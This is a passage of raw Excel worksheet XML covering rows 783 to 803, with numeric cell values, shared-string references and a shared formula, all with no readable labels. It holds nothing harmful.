        <v>42047.0</v>
      </c>
      <c r="L783" s="15"/>
      <c r="M783" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N783" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O783" s="29">
        <v>5.0</v>
      </c>
      <c r="P783" s="29">
        <v>8.0</v>
      </c>
      <c r="Q783" s="15"/>
      <c r="R783" s="15"/>
      <c r="S783" s="15"/>
      <c r="T783" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U783" s="5"/>
      <c r="V783" s="5"/>
      <c r="W783" s="47"/>
      <c r="X783" s="45"/>
      <c r="Y783" s="45"/>
      <c r="Z783" s="38" t="s">
        <v>3336</v>
      </c>
      <c r="AA783" s="39" t="s">
        <v>3337</v>
      </c>
      <c r="AB783" s="38" t="s">
        <v>3338</v>
      </c>
      <c r="AC783" s="40">
        <v>204770.0</v>
      </c>
      <c r="AD783" s="5"/>
      <c r="AE783" s="14"/>
      <c r="AF783" s="14"/>
    </row>
    <row r="784">
      <c r="A784" s="6">
        <f t="shared" si="1"/>
        <v>0.9371853162</v>
      </c>
      <c r="B784" s="29">
        <v>1.0</v>
      </c>
      <c r="C784" s="29">
        <v>262818.0</v>
      </c>
      <c r="D784" s="14"/>
      <c r="E784" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F784" s="14"/>
      <c r="G784" s="29">
        <v>3.0</v>
      </c>
      <c r="H784" s="29">
        <v>457.0</v>
      </c>
      <c r="I784" s="29">
        <v>13842.0</v>
      </c>
      <c r="J784" s="15"/>
      <c r="K784" s="29">
        <v>172946.0</v>
      </c>
      <c r="L784" s="15"/>
      <c r="M784" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N784" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O784" s="29">
        <v>1.0</v>
      </c>
      <c r="P784" s="29">
        <v>1.0</v>
      </c>
      <c r="Q784" s="15"/>
      <c r="R784" s="15"/>
      <c r="S784" s="15"/>
      <c r="T784" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U784" s="5"/>
      <c r="V784" s="5"/>
      <c r="W784" s="47"/>
      <c r="X784" s="45"/>
      <c r="Y784" s="45"/>
      <c r="Z784" s="38" t="s">
        <v>3339</v>
      </c>
      <c r="AA784" s="39" t="s">
        <v>3340</v>
      </c>
      <c r="AB784" s="38" t="s">
        <v>3341</v>
      </c>
      <c r="AC784" s="40">
        <v>262814.0</v>
      </c>
      <c r="AD784" s="5"/>
      <c r="AE784" s="14"/>
      <c r="AF784" s="14"/>
    </row>
    <row r="785">
      <c r="A785" s="6">
        <f t="shared" si="1"/>
        <v>0.882734437</v>
      </c>
      <c r="B785" s="29">
        <v>1.0</v>
      </c>
      <c r="C785" s="15"/>
      <c r="D785" s="14"/>
      <c r="E785" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F785" s="14"/>
      <c r="G785" s="29">
        <v>1.0</v>
      </c>
      <c r="H785" s="29">
        <v>872.0</v>
      </c>
      <c r="I785" s="29">
        <v>105240.0</v>
      </c>
      <c r="J785" s="15"/>
      <c r="K785" s="15"/>
      <c r="L785" s="15"/>
      <c r="M785" s="15"/>
      <c r="N785" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O785" s="29">
        <v>1.0</v>
      </c>
      <c r="P785" s="29">
        <v>3.0</v>
      </c>
      <c r="Q785" s="15"/>
      <c r="R785" s="15"/>
      <c r="S785" s="15"/>
      <c r="T785" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U785" s="5"/>
      <c r="V785" s="5"/>
      <c r="W785" s="47"/>
      <c r="X785" s="45"/>
      <c r="Y785" s="45"/>
      <c r="Z785" s="38" t="s">
        <v>3342</v>
      </c>
      <c r="AA785" s="39" t="s">
        <v>3343</v>
      </c>
      <c r="AB785" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC785" s="40">
        <v>120596.0</v>
      </c>
      <c r="AD785" s="5"/>
      <c r="AE785" s="14"/>
      <c r="AF785" s="14"/>
    </row>
    <row r="786">
      <c r="A786" s="6">
        <f t="shared" si="1"/>
        <v>0.7833700063</v>
      </c>
      <c r="B786" s="29">
        <v>1.0</v>
      </c>
      <c r="C786" s="29">
        <v>44338.0</v>
      </c>
      <c r="D786" s="14"/>
      <c r="E786" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F786" s="14"/>
      <c r="G786" s="29">
        <v>3.0</v>
      </c>
      <c r="H786" s="29">
        <v>665.0</v>
      </c>
      <c r="I786" s="29">
        <v>32356.0</v>
      </c>
      <c r="J786" s="15"/>
      <c r="K786" s="29">
        <v>32356.0</v>
      </c>
      <c r="L786" s="15"/>
      <c r="M786" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N786" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O786" s="29">
        <v>1.0</v>
      </c>
      <c r="P786" s="29">
        <v>2.0</v>
      </c>
      <c r="Q786" s="15"/>
      <c r="R786" s="15"/>
      <c r="S786" s="15"/>
      <c r="T786" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U786" s="5"/>
      <c r="V786" s="5"/>
      <c r="W786" s="47"/>
      <c r="X786" s="45"/>
      <c r="Y786" s="45"/>
      <c r="Z786" s="38" t="s">
        <v>3344</v>
      </c>
      <c r="AA786" s="39" t="s">
        <v>3345</v>
      </c>
      <c r="AB786" s="38" t="s">
        <v>3346</v>
      </c>
      <c r="AC786" s="40">
        <v>44337.0</v>
      </c>
      <c r="AD786" s="5"/>
      <c r="AE786" s="14"/>
      <c r="AF786" s="14"/>
    </row>
    <row r="787">
      <c r="A787" s="6">
        <f t="shared" si="1"/>
        <v>0.4748517849</v>
      </c>
      <c r="B787" s="29">
        <v>1.0</v>
      </c>
      <c r="C787" s="15"/>
      <c r="D787" s="14"/>
      <c r="E787" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F787" s="14"/>
      <c r="G787" s="29">
        <v>-1.0</v>
      </c>
      <c r="H787" s="29">
        <v>1230.0</v>
      </c>
      <c r="I787" s="29">
        <v>231453.0</v>
      </c>
      <c r="J787" s="15"/>
      <c r="K787" s="15"/>
      <c r="L787" s="15"/>
      <c r="M787" s="15"/>
      <c r="N787" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O787" s="29">
        <v>2.0</v>
      </c>
      <c r="P787" s="29">
        <v>1.0</v>
      </c>
      <c r="Q787" s="15"/>
      <c r="R787" s="15"/>
      <c r="S787" s="15"/>
      <c r="T787" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U787" s="5"/>
      <c r="V787" s="5"/>
      <c r="W787" s="47"/>
      <c r="X787" s="45"/>
      <c r="Y787" s="45"/>
      <c r="Z787" s="38" t="s">
        <v>3347</v>
      </c>
      <c r="AA787" s="39" t="s">
        <v>3348</v>
      </c>
      <c r="AB787" s="38" t="s">
        <v>1418</v>
      </c>
      <c r="AC787" s="40">
        <v>229246.0</v>
      </c>
      <c r="AD787" s="5"/>
      <c r="AE787" s="14"/>
      <c r="AF787" s="14"/>
    </row>
    <row r="788">
      <c r="A788" s="6">
        <f t="shared" si="1"/>
        <v>0.7333777431</v>
      </c>
      <c r="B788" s="29">
        <v>1.0</v>
      </c>
      <c r="C788" s="29">
        <v>173683.0</v>
      </c>
      <c r="D788" s="14"/>
      <c r="E788" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F788" s="14"/>
      <c r="G788" s="29">
        <v>2.0</v>
      </c>
      <c r="H788" s="29">
        <v>1665.0</v>
      </c>
      <c r="I788" s="29">
        <v>37051.0</v>
      </c>
      <c r="J788" s="15"/>
      <c r="K788" s="29">
        <v>37051.0</v>
      </c>
      <c r="L788" s="15"/>
      <c r="M788" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N788" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O788" s="29">
        <v>1.0</v>
      </c>
      <c r="P788" s="29">
        <v>2.0</v>
      </c>
      <c r="Q788" s="15"/>
      <c r="R788" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S788" s="15"/>
      <c r="T788" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U788" s="5"/>
      <c r="V788" s="5"/>
      <c r="W788" s="47"/>
      <c r="X788" s="45"/>
      <c r="Y788" s="45"/>
      <c r="Z788" s="38" t="s">
        <v>3349</v>
      </c>
      <c r="AA788" s="39" t="s">
        <v>3350</v>
      </c>
      <c r="AB788" s="38" t="s">
        <v>3351</v>
      </c>
      <c r="AC788" s="40">
        <v>173668.0</v>
      </c>
      <c r="AD788" s="5"/>
      <c r="AE788" s="14"/>
      <c r="AF788" s="14"/>
    </row>
    <row r="789">
      <c r="A789" s="6">
        <f t="shared" si="1"/>
        <v>0.9801677696</v>
      </c>
      <c r="B789" s="29">
        <v>1.0</v>
      </c>
      <c r="C789" s="29">
        <v>166505.0</v>
      </c>
      <c r="D789" s="14"/>
      <c r="E789" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F789" s="14"/>
      <c r="G789" s="29">
        <v>1.0</v>
      </c>
      <c r="H789" s="29">
        <v>580.0</v>
      </c>
      <c r="I789" s="29">
        <v>69697.0</v>
      </c>
      <c r="J789" s="15"/>
      <c r="K789" s="29">
        <v>27444.0</v>
      </c>
      <c r="L789" s="15"/>
      <c r="M789" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N789" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O789" s="29">
        <v>1.0</v>
      </c>
      <c r="P789" s="29">
        <v>0.0</v>
      </c>
      <c r="Q789" s="15"/>
      <c r="R789" s="15"/>
      <c r="S789" s="15"/>
      <c r="T789" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U789" s="5"/>
      <c r="V789" s="5"/>
      <c r="W789" s="47"/>
      <c r="X789" s="45"/>
      <c r="Y789" s="45"/>
      <c r="Z789" s="38" t="s">
        <v>3352</v>
      </c>
      <c r="AA789" s="39" t="s">
        <v>3353</v>
      </c>
      <c r="AB789" s="38" t="s">
        <v>3354</v>
      </c>
      <c r="AC789" s="40">
        <v>166473.0</v>
      </c>
      <c r="AD789" s="5"/>
      <c r="AE789" s="14"/>
      <c r="AF789" s="14"/>
    </row>
    <row r="790">
      <c r="A790" s="6">
        <f t="shared" si="1"/>
        <v>0.4233831597</v>
      </c>
      <c r="B790" s="29">
        <v>1.0</v>
      </c>
      <c r="C790" s="29">
        <v>239675.0</v>
      </c>
      <c r="D790" s="14"/>
      <c r="E790" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F790" s="14"/>
      <c r="G790" s="29">
        <v>2.0</v>
      </c>
      <c r="H790" s="29">
        <v>93.0</v>
      </c>
      <c r="I790" s="29">
        <v>224548.0</v>
      </c>
      <c r="J790" s="15"/>
      <c r="K790" s="29">
        <v>95381.0</v>
      </c>
      <c r="L790" s="15"/>
      <c r="M790" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N790" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O790" s="29">
        <v>1.0</v>
      </c>
      <c r="P790" s="29">
        <v>0.0</v>
      </c>
      <c r="Q790" s="15"/>
      <c r="R790" s="15"/>
      <c r="S790" s="15"/>
      <c r="T790" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U790" s="5"/>
      <c r="V790" s="5"/>
      <c r="W790" s="47"/>
      <c r="X790" s="45"/>
      <c r="Y790" s="45"/>
      <c r="Z790" s="38" t="s">
        <v>3355</v>
      </c>
      <c r="AA790" s="39" t="s">
        <v>3356</v>
      </c>
      <c r="AB790" s="38" t="s">
        <v>3357</v>
      </c>
      <c r="AC790" s="40">
        <v>239672.0</v>
      </c>
      <c r="AD790" s="5"/>
      <c r="AE790" s="14"/>
      <c r="AF790" s="14"/>
    </row>
    <row r="791">
      <c r="A791" s="6">
        <f t="shared" si="1"/>
        <v>0.420834958</v>
      </c>
      <c r="B791" s="29">
        <v>1.0</v>
      </c>
      <c r="C791" s="15"/>
      <c r="D791" s="14"/>
      <c r="E791" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F791" s="14"/>
      <c r="G791" s="29">
        <v>2.0</v>
      </c>
      <c r="H791" s="29">
        <v>129.0</v>
      </c>
      <c r="I791" s="29">
        <v>106510.0</v>
      </c>
      <c r="J791" s="15"/>
      <c r="K791" s="15"/>
      <c r="L791" s="15"/>
      <c r="M791" s="15"/>
      <c r="N791" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O791" s="29">
        <v>2.0</v>
      </c>
      <c r="P791" s="29">
        <v>0.0</v>
      </c>
      <c r="Q791" s="15"/>
      <c r="R791" s="15"/>
      <c r="S791" s="15"/>
      <c r="T791" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U791" s="5"/>
      <c r="V791" s="5"/>
      <c r="W791" s="47"/>
      <c r="X791" s="45"/>
      <c r="Y791" s="45"/>
      <c r="Z791" s="38" t="s">
        <v>3358</v>
      </c>
      <c r="AA791" s="39" t="s">
        <v>3359</v>
      </c>
      <c r="AB791" s="38" t="s">
        <v>3360</v>
      </c>
      <c r="AC791" s="40">
        <v>221842.0</v>
      </c>
      <c r="AD791" s="5"/>
      <c r="AE791" s="14"/>
      <c r="AF791" s="14"/>
    </row>
    <row r="792">
      <c r="A792" s="6">
        <f t="shared" si="1"/>
        <v>0.6169893532</v>
      </c>
      <c r="B792" s="29">
        <v>1.0</v>
      </c>
      <c r="C792" s="15"/>
      <c r="D792" s="14"/>
      <c r="E792" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F792" s="14"/>
      <c r="G792" s="29">
        <v>7.0</v>
      </c>
      <c r="H792" s="29">
        <v>720.0</v>
      </c>
      <c r="I792" s="29">
        <v>103659.0</v>
      </c>
      <c r="J792" s="15"/>
      <c r="K792" s="15"/>
      <c r="L792" s="15"/>
      <c r="M792" s="14"/>
      <c r="N792" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O792" s="29">
        <v>3.0</v>
      </c>
      <c r="P792" s="29">
        <v>1.0</v>
      </c>
      <c r="Q792" s="15"/>
      <c r="R792" s="15"/>
      <c r="S792" s="15"/>
      <c r="T792" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U792" s="5"/>
      <c r="V792" s="5"/>
      <c r="W792" s="47"/>
      <c r="X792" s="45"/>
      <c r="Y792" s="45"/>
      <c r="Z792" s="38" t="s">
        <v>3361</v>
      </c>
      <c r="AA792" s="39" t="s">
        <v>3362</v>
      </c>
      <c r="AB792" s="38" t="s">
        <v>1584</v>
      </c>
      <c r="AC792" s="40">
        <v>122770.0</v>
      </c>
      <c r="AD792" s="5"/>
      <c r="AE792" s="14"/>
      <c r="AF792" s="14"/>
    </row>
    <row r="793">
      <c r="A793" s="6">
        <f t="shared" si="1"/>
        <v>0.4505155274</v>
      </c>
      <c r="B793" s="29">
        <v>1.0</v>
      </c>
      <c r="C793" s="15"/>
      <c r="D793" s="14"/>
      <c r="E793" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F793" s="14"/>
      <c r="G793" s="29">
        <v>13.0</v>
      </c>
      <c r="H793" s="29">
        <v>577.0</v>
      </c>
      <c r="I793" s="29">
        <v>142793.0</v>
      </c>
      <c r="J793" s="15"/>
      <c r="K793" s="15"/>
      <c r="L793" s="15"/>
      <c r="M793" s="15"/>
      <c r="N793" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O793" s="29">
        <v>1.0</v>
      </c>
      <c r="P793" s="29">
        <v>0.0</v>
      </c>
      <c r="Q793" s="15"/>
      <c r="R793" s="15"/>
      <c r="S793" s="15"/>
      <c r="T793" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U793" s="5"/>
      <c r="V793" s="5"/>
      <c r="W793" s="47"/>
      <c r="X793" s="45"/>
      <c r="Y793" s="45"/>
      <c r="Z793" s="38" t="s">
        <v>3363</v>
      </c>
      <c r="AA793" s="39" t="s">
        <v>3364</v>
      </c>
      <c r="AB793" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC793" s="40">
        <v>154646.0</v>
      </c>
      <c r="AD793" s="5"/>
      <c r="AE793" s="14"/>
      <c r="AF793" s="14"/>
    </row>
    <row r="794">
      <c r="A794" s="6">
        <f t="shared" si="1"/>
        <v>0.1158995843</v>
      </c>
      <c r="B794" s="29">
        <v>1.0</v>
      </c>
      <c r="C794" s="29">
        <v>230297.0</v>
      </c>
      <c r="D794" s="14"/>
      <c r="E794" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F794" s="14"/>
      <c r="G794" s="29">
        <v>0.0</v>
      </c>
      <c r="H794" s="29">
        <v>4183.0</v>
      </c>
      <c r="I794" s="29">
        <v>232865.0</v>
      </c>
      <c r="J794" s="15"/>
      <c r="K794" s="15"/>
      <c r="L794" s="15"/>
      <c r="M794" s="15"/>
      <c r="N794" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O794" s="29">
        <v>2.0</v>
      </c>
      <c r="P794" s="29">
        <v>3.0</v>
      </c>
      <c r="Q794" s="15"/>
      <c r="R794" s="15"/>
      <c r="S794" s="15"/>
      <c r="T794" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U794" s="5"/>
      <c r="V794" s="5"/>
      <c r="W794" s="47"/>
      <c r="X794" s="45"/>
      <c r="Y794" s="45"/>
      <c r="Z794" s="38" t="s">
        <v>3365</v>
      </c>
      <c r="AA794" s="39" t="s">
        <v>3366</v>
      </c>
      <c r="AB794" s="38" t="s">
        <v>3367</v>
      </c>
      <c r="AC794" s="40">
        <v>230293.0</v>
      </c>
      <c r="AD794" s="5"/>
      <c r="AE794" s="14"/>
      <c r="AF794" s="14"/>
    </row>
    <row r="795">
      <c r="A795" s="6">
        <f t="shared" si="1"/>
        <v>0.003219878191</v>
      </c>
      <c r="B795" s="29">
        <v>1.0</v>
      </c>
      <c r="C795" s="14"/>
      <c r="D795" s="14"/>
      <c r="E795" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F795" s="14"/>
      <c r="G795" s="29">
        <v>1.0</v>
      </c>
      <c r="H795" s="29">
        <v>559.0</v>
      </c>
      <c r="I795" s="29">
        <v>124080.0</v>
      </c>
      <c r="J795" s="15"/>
      <c r="K795" s="15"/>
      <c r="L795" s="15"/>
      <c r="M795" s="14"/>
      <c r="N795" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O795" s="29">
        <v>1.0</v>
      </c>
      <c r="P795" s="29">
        <v>0.0</v>
      </c>
      <c r="Q795" s="15"/>
      <c r="R795" s="15"/>
      <c r="S795" s="15"/>
      <c r="T795" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U795" s="5"/>
      <c r="V795" s="5"/>
      <c r="W795" s="47"/>
      <c r="X795" s="45"/>
      <c r="Y795" s="45"/>
      <c r="Z795" s="38" t="s">
        <v>3368</v>
      </c>
      <c r="AA795" s="39" t="s">
        <v>3369</v>
      </c>
      <c r="AB795" s="38" t="s">
        <v>3370</v>
      </c>
      <c r="AC795" s="40">
        <v>238345.0</v>
      </c>
      <c r="AD795" s="5"/>
      <c r="AE795" s="14"/>
      <c r="AF795" s="14"/>
    </row>
    <row r="796">
      <c r="A796" s="6">
        <f t="shared" si="1"/>
        <v>0.3577761572</v>
      </c>
      <c r="B796" s="29">
        <v>1.0</v>
      </c>
      <c r="C796" s="14"/>
      <c r="D796" s="14"/>
      <c r="E796" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F796" s="14"/>
      <c r="G796" s="29">
        <v>7.0</v>
      </c>
      <c r="H796" s="29">
        <v>521.0</v>
      </c>
      <c r="I796" s="29">
        <v>106691.0</v>
      </c>
      <c r="J796" s="15"/>
      <c r="K796" s="29">
        <v>106692.0</v>
      </c>
      <c r="L796" s="15"/>
      <c r="M796" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N796" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O796" s="29">
        <v>4.0</v>
      </c>
      <c r="P796" s="29">
        <v>10.0</v>
      </c>
      <c r="Q796" s="15"/>
      <c r="R796" s="15"/>
      <c r="S796" s="15"/>
      <c r="T796" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U796" s="5"/>
      <c r="V796" s="5"/>
      <c r="W796" s="47"/>
      <c r="X796" s="45"/>
      <c r="Y796" s="45"/>
      <c r="Z796" s="38" t="s">
        <v>3371</v>
      </c>
      <c r="AA796" s="39" t="s">
        <v>3372</v>
      </c>
      <c r="AB796" s="38" t="s">
        <v>3373</v>
      </c>
      <c r="AC796" s="40">
        <v>119672.0</v>
      </c>
      <c r="AD796" s="5"/>
      <c r="AE796" s="14"/>
      <c r="AF796" s="14"/>
    </row>
    <row r="797">
      <c r="A797" s="6">
        <f t="shared" si="1"/>
        <v>0.1401265462</v>
      </c>
      <c r="B797" s="29">
        <v>1.0</v>
      </c>
      <c r="C797" s="15"/>
      <c r="D797" s="14"/>
      <c r="E797" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F797" s="14"/>
      <c r="G797" s="29">
        <v>2.0</v>
      </c>
      <c r="H797" s="29">
        <v>203.0</v>
      </c>
      <c r="I797" s="29">
        <v>236996.0</v>
      </c>
      <c r="J797" s="15"/>
      <c r="K797" s="29">
        <v>6253.0</v>
      </c>
      <c r="L797" s="15"/>
      <c r="M797" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N797" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O797" s="29">
        <v>0.0</v>
      </c>
      <c r="P797" s="29">
        <v>7.0</v>
      </c>
      <c r="Q797" s="15"/>
      <c r="R797" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S797" s="15"/>
      <c r="T797" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U797" s="5"/>
      <c r="V797" s="5"/>
      <c r="W797" s="47"/>
      <c r="X797" s="45"/>
      <c r="Y797" s="45"/>
      <c r="Z797" s="38" t="s">
        <v>3374</v>
      </c>
      <c r="AA797" s="39" t="s">
        <v>3375</v>
      </c>
      <c r="AB797" s="38" t="s">
        <v>3376</v>
      </c>
      <c r="AC797" s="40">
        <v>238546.0</v>
      </c>
      <c r="AD797" s="5"/>
      <c r="AE797" s="14"/>
      <c r="AF797" s="14"/>
    </row>
    <row r="798">
      <c r="A798" s="6">
        <f t="shared" si="1"/>
        <v>0.2288424411</v>
      </c>
      <c r="B798" s="29">
        <v>1.0</v>
      </c>
      <c r="C798" s="14"/>
      <c r="D798" s="14"/>
      <c r="E798" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F798" s="14"/>
      <c r="G798" s="29">
        <v>3.0</v>
      </c>
      <c r="H798" s="29">
        <v>981.0</v>
      </c>
      <c r="I798" s="29">
        <v>50546.0</v>
      </c>
      <c r="J798" s="15"/>
      <c r="K798" s="15"/>
      <c r="L798" s="15"/>
      <c r="M798" s="15"/>
      <c r="N798" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O798" s="29">
        <v>1.0</v>
      </c>
      <c r="P798" s="29">
        <v>4.0</v>
      </c>
      <c r="Q798" s="15"/>
      <c r="R798" s="15"/>
      <c r="S798" s="15"/>
      <c r="T798" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U798" s="5"/>
      <c r="V798" s="5"/>
      <c r="W798" s="47"/>
      <c r="X798" s="45"/>
      <c r="Y798" s="45"/>
      <c r="Z798" s="38" t="s">
        <v>3377</v>
      </c>
      <c r="AA798" s="39" t="s">
        <v>3378</v>
      </c>
      <c r="AB798" s="38" t="s">
        <v>2168</v>
      </c>
      <c r="AC798" s="40">
        <v>62653.0</v>
      </c>
      <c r="AD798" s="5"/>
      <c r="AE798" s="14"/>
      <c r="AF798" s="14"/>
    </row>
    <row r="799">
      <c r="A799" s="6">
        <f t="shared" si="1"/>
        <v>0.5303354507</v>
      </c>
      <c r="B799" s="29">
        <v>1.0</v>
      </c>
      <c r="C799" s="14"/>
      <c r="D799" s="14"/>
      <c r="E799" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F799" s="14"/>
      <c r="G799" s="29">
        <v>1.0</v>
      </c>
      <c r="H799" s="29">
        <v>247.0</v>
      </c>
      <c r="I799" s="29">
        <v>71607.0</v>
      </c>
      <c r="J799" s="15"/>
      <c r="K799" s="15"/>
      <c r="L799" s="15"/>
      <c r="M799" s="14"/>
      <c r="N799" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O799" s="29">
        <v>1.0</v>
      </c>
      <c r="P799" s="29">
        <v>2.0</v>
      </c>
      <c r="Q799" s="15"/>
      <c r="R799" s="15"/>
      <c r="S799" s="15"/>
      <c r="T799" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U799" s="5"/>
      <c r="V799" s="5"/>
      <c r="W799" s="47"/>
      <c r="X799" s="45"/>
      <c r="Y799" s="45"/>
      <c r="Z799" s="38" t="s">
        <v>3379</v>
      </c>
      <c r="AA799" s="39" t="s">
        <v>3380</v>
      </c>
      <c r="AB799" s="38" t="s">
        <v>3381</v>
      </c>
      <c r="AC799" s="40">
        <v>203070.0</v>
      </c>
      <c r="AD799" s="5"/>
      <c r="AE799" s="14"/>
      <c r="AF799" s="14"/>
    </row>
    <row r="800">
      <c r="A800" s="6">
        <f t="shared" si="1"/>
        <v>0.4018989201</v>
      </c>
      <c r="B800" s="29">
        <v>1.0</v>
      </c>
      <c r="C800" s="29">
        <v>261530.0</v>
      </c>
      <c r="D800" s="14"/>
      <c r="E800" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F800" s="14"/>
      <c r="G800" s="29">
        <v>0.0</v>
      </c>
      <c r="H800" s="29">
        <v>562.0</v>
      </c>
      <c r="I800" s="29">
        <v>274257.0</v>
      </c>
      <c r="J800" s="15"/>
      <c r="K800" s="29">
        <v>6253.0</v>
      </c>
      <c r="L800" s="15"/>
      <c r="M800" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N800" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O800" s="29">
        <v>1.0</v>
      </c>
      <c r="P800" s="29">
        <v>1.0</v>
      </c>
      <c r="Q800" s="15"/>
      <c r="R800" s="15"/>
      <c r="S800" s="15"/>
      <c r="T800" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U800" s="5"/>
      <c r="V800" s="5"/>
      <c r="W800" s="47"/>
      <c r="X800" s="45"/>
      <c r="Y800" s="45"/>
      <c r="Z800" s="38" t="s">
        <v>3382</v>
      </c>
      <c r="AA800" s="39" t="s">
        <v>3383</v>
      </c>
      <c r="AB800" s="38" t="s">
        <v>3384</v>
      </c>
      <c r="AC800" s="40">
        <v>259562.0</v>
      </c>
      <c r="AD800" s="5"/>
      <c r="AE800" s="14"/>
      <c r="AF800" s="14"/>
    </row>
    <row r="801">
      <c r="A801" s="6">
        <f t="shared" si="1"/>
        <v>0.004011862158</v>
      </c>
      <c r="B801" s="29">
        <v>1.0</v>
      </c>
      <c r="C801" s="29">
        <v>180822.0</v>
      </c>
      <c r="D801" s="14"/>
      <c r="E801" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F801" s="14"/>
      <c r="G801" s="29">
        <v>1.0</v>
      </c>
      <c r="H801" s="29">
        <v>201.0</v>
      </c>
      <c r="I801" s="29">
        <v>171121.0</v>
      </c>
      <c r="J801" s="15"/>
      <c r="K801" s="29">
        <v>6253.0</v>
      </c>
      <c r="L801" s="15"/>
      <c r="M801" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N801" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O801" s="29">
        <v>1.0</v>
      </c>
      <c r="P801" s="29">
        <v>5.0</v>
      </c>
      <c r="Q801" s="15"/>
      <c r="R801" s="15"/>
      <c r="S801" s="15"/>
      <c r="T801" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U801" s="5"/>
      <c r="V801" s="5"/>
      <c r="W801" s="47"/>
      <c r="X801" s="45"/>
      <c r="Y801" s="45"/>
      <c r="Z801" s="38" t="s">
        <v>3385</v>
      </c>
      <c r="AA801" s="39" t="s">
        <v>3386</v>
      </c>
      <c r="AB801" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC801" s="40">
        <v>180807.0</v>
      </c>
      <c r="AD801" s="5"/>
      <c r="AE801" s="14"/>
      <c r="AF801" s="14"/>
    </row>
    <row r="802">
      <c r="A802" s="6">
        <f t="shared" si="1"/>
        <v>0.1895970287</v>
      </c>
      <c r="B802" s="29">
        <v>1.0</v>
      </c>
      <c r="C802" s="15"/>
      <c r="D802" s="14"/>
      <c r="E802" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F802" s="14"/>
      <c r="G802" s="29">
        <v>0.0</v>
      </c>
      <c r="H802" s="29">
        <v>1633.0</v>
      </c>
      <c r="I802" s="29">
        <v>34977.0</v>
      </c>
      <c r="J802" s="5" t="s">
        <v>3387</v>
      </c>
      <c r="K802" s="15"/>
      <c r="L802" s="15"/>
      <c r="M802" s="15"/>
      <c r="N802" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O802" s="29">
        <v>2.0</v>
      </c>
      <c r="P802" s="29">
        <v>3.0</v>
      </c>
      <c r="Q802" s="15"/>
      <c r="R802" s="15"/>
      <c r="S802" s="15"/>
      <c r="T802" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U802" s="5"/>
      <c r="V802" s="5"/>
      <c r="W802" s="47"/>
      <c r="X802" s="45"/>
      <c r="Y802" s="45"/>
      <c r="Z802" s="38" t="s">
        <v>3388</v>
      </c>
      <c r="AA802" s="39" t="s">
        <v>3389</v>
      </c>
      <c r="AB802" s="38" t="s">
        <v>3390</v>
      </c>
      <c r="AC802" s="40">
        <v>59595.0</v>
      </c>
      <c r="AD802" s="5"/>
      <c r="AE802" s="14"/>
      <c r="AF802" s="14"/>
    </row>
    <row r="803">
      <c r="A803" s="6">
        <f t="shared" si="1"/>
        <v>0.6111336144</v>
      </c>
      <c r="B803" s="29">
        <v>1.0</v>
      </c>
      <c r="C803" s="29">
        <v>145579.0</v>
      </c>
      <c r="D803" s="14"/>
